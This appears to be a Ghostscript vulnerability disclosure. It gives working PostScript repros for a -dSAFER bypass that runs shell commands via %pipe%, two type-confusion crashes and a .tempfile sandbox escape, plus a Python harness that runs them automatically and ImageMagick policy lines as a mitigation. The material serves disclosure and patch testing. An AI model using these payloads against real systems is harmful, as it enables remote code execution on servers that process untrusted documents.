Vulnerabilities in Ghostscript can lead to remote code execution
1. /invalidaccess checks stop working after a failed restore, so you can just execute shell commands if you handle the error. Exploitation is very trivial. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

2. setcolor claims no operand checking is necessary, because it's hidden behind a pseudo-operator of the same name. That's true, but you can still call it indirectly via setpattern, so type checking is necessary. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /Whatever 16#414141414141 >> setpattern
Segmentation fault

3. The LockDistillerParams boolean isn't type checked, so nice easy type confusion. Repro:
$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams
Segmentation fault

4. .tempfile permissions don't seem to work, I don't know when they broke. You're not supposed to be able to open files outside of the patterns in the PermitFileReading array, but that doesn't seem to work for me, e.g.:
$ strace -fefile gs -sDEVICE=ppmraw -dSAFER
…
GS>(/proc/self/cwd/hello) (w) .tempfile
open("/proc/self/cwd/hello26E8LQ", O_RDWR|O_CREAT|O_EXCL, 0600) = 3
GS<2>dup
GS<3>(hello) writestring
GS<2>closefile
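
The four repros above are interactive. As an added check that is not part of the original post, the Python harness below runs each of them non-interactively against a local Ghostscript and reports one verdict per case, so a build can be tested without typing at the GS> prompt. Assumptions: a Linux host (case 4 uses /proc/self/cwd exactly as the post does), a gs binary on PATH or named by a GS_BIN environment variable (my convention, not a Ghostscript one), and, in case 1, `touch MARKER` substituted for the post's `id` so that success is detectable as a file on disk rather than by parsing output. The function and verdict names are mine.

```python
"""Non-interactive harness for the four Ghostscript repros above.

Added example, not code from the original post. Assumes a Linux host (case 4
uses /proc/self/cwd exactly as the post does) and a `gs` binary on PATH or
named by the GS_BIN environment variable (an assumed convention). Case 1
substitutes `touch MARKER` for the post's `id` so the harness can look for
the marker file instead of parsing output.
"""
import os
import shutil
import subprocess
import tempfile

GS_BIN = os.environ.get("GS_BIN", "gs")

# PostScript bodies lifted from the post's interactive sessions. MARKER is
# replaced per run by render() below.
PAYLOADS = {
    # 1. a failed restore turns off /invalidaccess checks; %pipe% then reaches popen
    "restore_pipe_bypass":
        "legal\n"
        "{ null restore } stopped { pop } if\n"
        "legal\n"
        "mark /OutputFile (%pipe%touch MARKER) currentdevice putdeviceprops\n"
        "showpage\n",
    # 2. setpattern hands an unchecked operand to setcolor
    "setpattern_typecheck":
        "<< /Whatever 16#414141414141 >> setpattern\n",
    # 3. LockDistillerParams is used without a type check
    "distillerparams_typecheck":
        "<< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams\n",
    # 4. .tempfile creates a file outside the permitted directories
    "tempfile_escape":
        "(/proc/self/cwd/MARKER) (w) .tempfile closefile pop\n",
}

VERDICTS = {"vulnerable", "crash", "not-reproduced", "timeout", "gs-not-found"}


def render(name, workdir):
    """Fill in the marker: a full path for case 1, a bare prefix for case 4
    (gs appends random characters to .tempfile names, so we match a prefix)."""
    marker = "probe" if name == "tempfile_escape" else os.path.join(workdir, "pwned")
    return PAYLOADS[name].replace("MARKER", marker)


def marker_hit(name, workdir):
    """True if the run left behind the artefact that proves SAFER was bypassed."""
    if name == "tempfile_escape":
        return os.path.isdir(workdir) and any(
            f.startswith("probe") for f in os.listdir(workdir))
    return os.path.exists(os.path.join(workdir, "pwned"))


def classify(returncode, hit):
    """Map one gs run to a verdict. subprocess reports death by signal as a
    negative return code, which is what the two type confusions produce."""
    if hit:
        return "vulnerable"
    if returncode < 0:
        return "crash"
    return "not-reproduced"


def run_one(name, timeout=20):
    if shutil.which(GS_BIN) is None:
        return "gs-not-found"
    with tempfile.TemporaryDirectory() as workdir:
        script = os.path.join(workdir, "case.ps")
        with open(script, "w") as fh:
            fh.write(render(name, workdir))
        # Same invocation as the post, plus -dNOPAUSE/-dBATCH so gs exits on its own.
        cmd = [GS_BIN, "-q", "-dSAFER", "-dNOPAUSE", "-dBATCH",
               "-sDEVICE=ppmraw", "-sOutputFile=/dev/null", script]
        try:
            proc = subprocess.run(cmd, cwd=workdir, stdin=subprocess.DEVNULL,
                                  capture_output=True, timeout=timeout)
        except subprocess.TimeoutExpired:
            return "timeout"
        return classify(proc.returncode, marker_hit(name, workdir))


def run_all():
    """Verdict per case; every value is one of VERDICTS."""
    return {name: run_one(name) for name in PAYLOADS}


if __name__ == "__main__":
    for name, verdict in run_all().items():
        print(f"{name:26} {verdict}")
```

A "vulnerable" verdict on case 1 or 4 means -dSAFER was bypassed (a command ran, or a file landed where the policy should have refused it); "crash" on cases 2 or 3 means gs died on a signal, which is what the type confusions produce on the affected builds. A fixed build reports "not-reproduced" for all four.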
ImageMagick policy.xml entries that disable the Ghostscript-backed coders:

<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
<policy domain="coder" rights="none" pattern="XPS" />